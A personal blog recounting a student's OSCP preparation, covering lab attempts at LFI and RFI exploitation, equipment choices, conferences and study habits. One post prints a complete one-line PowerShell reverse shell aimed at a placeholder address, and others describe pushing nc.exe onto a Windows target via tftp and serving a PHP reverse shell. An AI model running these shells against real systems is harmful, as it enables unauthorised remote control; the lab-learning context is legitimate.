RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and thought to myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old and http cacheing wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script, and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sláinte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.

15 days into to the OSCP and I am tired…

Hi everyone. I don’t think I officially started blogging about my OSCP journey. So, here, 15 days in and I am blogging while my latest PWK VM is being copied from C:/ to my NAS.

I have about 9 years of managerial cybersecurity experience under my belt, and as you can see from my earlier posts, I have been working for about 6 months getting prepped for my OSCP jump. I was working through Georgia Weidman’s Book, Penetration Testing: A Hands-On Introduction to Hacking, got frustrated at Cybrary for a hot one (some of the basic modules has flaws, not to mention my I would get kicked off the penetration testing pro track pretty much every week, and had to wait till Cybrary was back from the weekend to get sorted out). I thought about going back and doing my CE|H v10 but decided (thanks to my wife) that I should just go for the OSCP.

I was able to convince my work to flip the bill for 90 days of the lab and the materials, and whee! Here we go, into the rabbit hole. I have been scraping the web on people’s thoughts/preparation on the OSCP and shit myself in the process because this is a deep journey, and everyone is different, so I have to stop reading and just start moving.

Week 1: Got the monstrous course book, and the videos. Backed them up like three times since there is a fine for losing them and asking for them again. Worked verbatim through the videos, racking up some shell scripts and python on my PWK VM, and then realized that if I go through the book document all relevant exercises and pwn 10 machines, writing up a report, PDF it to Offensive Security, I would get 5 bonus points on my OSCP score. Some people say it’s not worth it, but I think it’s an awesome way to study and practice for the real deal, so I dropped doing the videos and started moving through the book.

Week 2: I am one slow man. I did manage to setup my PWK VM a bit better, realizing that terminator is the way to go, along with using OneNote to record my lab exercises and notes. I am three chapters out of 18 to go. I have a strange feeling that I will be asking for more lab time.

So, today I mounted an empty folder over my root folder in my PWK VM image today. I am not smart man. I can’t stress how glad I was for using OneNote online to backup my notes and exercises.  Backup, backup, backup.  The VMWare tools aren’t really working (at the moment) with the PWK VM, but after I messed everything up, I followed this chap’s thoughts on bridging a folder between the VM and the host, with the host folder backing up to the cloud. I chose OneDrive since my my OneNote online notebook for my notes and exercises were going there and the Surface Laptop I am using is so friggen integrated with OneDrive, I get that folder structure on my laptop mixed up with the simple core folders I have locally all the time. Moving forward, I see no reason not to back up my entire VM when I make changes to it.

Currently 6pm on 12/29/2018. I aim to get through a good portion of chapter 4 tomorrow. Remember, it’s an OSCP journey. I am so passionate about this stuff, and with time, I think I can rock this. I just need to be smart, and honestly, move a bit faster.

Finally landed on the Surface Laptop 2

Well, the Matebook X Pro didn’t fair well to a dual boot with Kali and Windows.   I think it had something to do with the weird 3000×2000 resolution and the fact that grub couldn’t understand that to boot into an installer for Kali.  I tried working on different grub commands, but eh, I did so much that I couldn’t get the machine to boot back into the original install.

So I took it back to the store and decided VM only – no dual booting.  I mean, OSCP is set up to work within a VM, all my practice books are with VMs.  So VM it is – and I need a good supported VM app, so Windows with VMWare Workstation was the way to go.  I also wanted a laptop that will last, so I put up the extra cash for the new Surface Laptop 2.  I am happy so far.  I do wish it has a USB-C as the MXP did, but it wasn’t a deal breaker.  Back to studying!

Happy Monday!

Currently listening to Desi, waiting for my new USB stick to finish a slow format.  So I have been using my wife’s computer to start prepping for the OSCP, and I have to say, that was a bad idea.  I have a mac, but trying to create my own virtual lab in there has been rough.  I used VirtualBox to do this, but VMWare workstation on a windows machine just seems to get the job done right.

So, my first thought was to go with a souped-up Chromebook.  I went ahead and got the i7 Pixelbook.  Nice looking machine, and yes, I think ChromeOS is nice – but I wanted to run Linux off of it.  So I went two different routes on this, and both didn’t work like I needed it to.

Route 1:  I changed my channel to the developer channel and just used the crostini linux that google offered from this channel.  It wasn’t a full blown linux like I needed.  So scratch that.

Route 2: I put the Pixelbook in developer mode, and ran chroots of linux.  After some crazy finagling, I got kali-rolling on a xfce desktop.  But, still limited – for example, I couldn’t do any networking – this was just a virtual container running on ChromeOS.

I didn’t try wiping the OS and just installing a linux on metal.  Mainly because I was afraid that doing that would lock me into not being able to return the machine.  After not being able to successfully do either of the above routes, I put the machine back on the stable channel, main mode, and powerwash.

I haven’t gotten my $ back (it’s still in the mail), but I need a machine that is not my wife’s.  Some googling commenced, and I settled on a Matebook X Pro (MXP).  I think it’s the best bang for your buck.  I almost bought a Surface Book 2, but it was clunky, and $1K more.  I don’t really need a 2-in-1.  The only thing about the MXP is the resolution is a bit wack.  It works, but it’s like 3000×2000 – and then you have to increase the font size.  So far, ok, but some of my older Vms (windows 7, XP, Ubuntu) are hard to see/really small.  But the ports, the size, and the power of the computer I really like.  I am a bit concerned about the build – Chinese products sometimes don’t last as long, and I am hoping this will take me 5 years out.  But I hope that I am done with my OSCP at that time, and might be time for a new PC, based on what I learned.

I am going to set up a dual boot on Kali and Windows.  The drive is a 512MB SSD and so far, all is well, except for the heat – the computer does come with a 1 year warranty, so I am going to lean on that if something doesn’t go well.

My first Pros Vs. Joes!

So BsidesDC is this weekend, and honestly, I am really not sure why the ham sandwich I haven’t been to the conference all these years.  I am really trying to focus on getting back into the technical realm, and conferences like this have some great presentations, speakers, and just interesting people – so yah, I am going.  It’s gonna be f&*#@ fantastic.  And then, just today, I got invited by @malwaremama to participate in @dichotomy1‘s ProsVsJoes event.  Hell’s bells son.  Better firm up those whitelists and start closing down unnecessary ports, it’s gonna get crazy.  Here’s my checklist:

For now, a bit of reading, and a good time will be had by all 🙂

 

Back to the basics

I submitted my request to my work to cover the PWK course to help me get my OSCP.  I haven’t heard back yet, and I think that is a good thing – I need to read and study more.   I am back into Georgia’s Book – chapter 6.  I feel like a kid getting ready to try to climb a mountain using hills as practice.  But the hills are good – there is just a lot to learn.  Back at it!

Getting Swamped!

You know when you have so much information, you don’t know where to start, so you just don’t?  That is where I am at the current moment.  It’s good, but it’s been 2 weeks, and I really haven’t made progress on Georgia’s book.  Today, I will work on it.  That is until I get the OSCP material!

I have been doing a few things other than studying – but it’s been good.  I have been:

  1. attending the first CSA-DC chapter meeting.  I met Anil, the host and founder of the chapter at a Federal Cloud Summit in DC.  I really enjoyed it and will go back for their next meetup in January.  But I met Martin there!  He’s a pentester AND he is from Argentina.   That’s awesome – we met up later again to talk about how to get into pentesting and Argentina, which my family and I are vacationing to in February of next year.
  2. Attended the 2018 Cyber Maryland conference.  I really had a good time.  Some jerk talked my ear off about how idiotic I am for being a federal employee and how he’s racist inherently because he’s white.  Just some random stranger.  We live in some odd times, folks.  But after that, it was awesome!  There were three presentations that stood out to me:
    1. One on Snowden and Quantum Computing.  It solidified my thoughts on Snowden – he’s a traitor and really F*&#$ up our national security.  99% of what he leaked isn’t even about privacy.  It was national secrets, folks.  You’re welcome, Russia.  I also really enjoyed the discussion on Quantum Computing.
    2. Synthetic Identities on the Dark Web.  I never knew how susceptible kids are to identity fraud so easily.  Freeze your Kids credit, folks.
    3. Election Security.  We need to go to paper ballots.  But we are idiots and apparently, West Virginia is going to use blockchain to have votes counted.  Mobile Voting in the 2018 elections.  It’s a horrible idea.

      xkcd
      I met Amber there!  Totally awesome person – she told me about some things that she is working on and I really hope to stay in touch.

  3. Decided through Martin and my wife that I am going to just start studying for the OSCP.  I have been waffling around books and thinking about getting my Pentest+ (which is so new, no one knows if it’s good), or retake the CEH… Inna stated that if she is going to give me the time to study, just go for the one that matters – and Martin, he thinks the same thing.  The test with 3 months of the lab is $1,150.00.  That, in hindsight, is nothing, and if I fail, it’s only 60 bucks for a retake.   So, I am going to make a case to my boss about taking it, and if that doesn’t work, I’ll just pay for it out of pocket.  Work is slowing down for the holidays – I am going for it.  I am going to #tryharder 🙂

tldr; I did some stuff, made some friends, F&$%# it, I am going straight for my OSCP.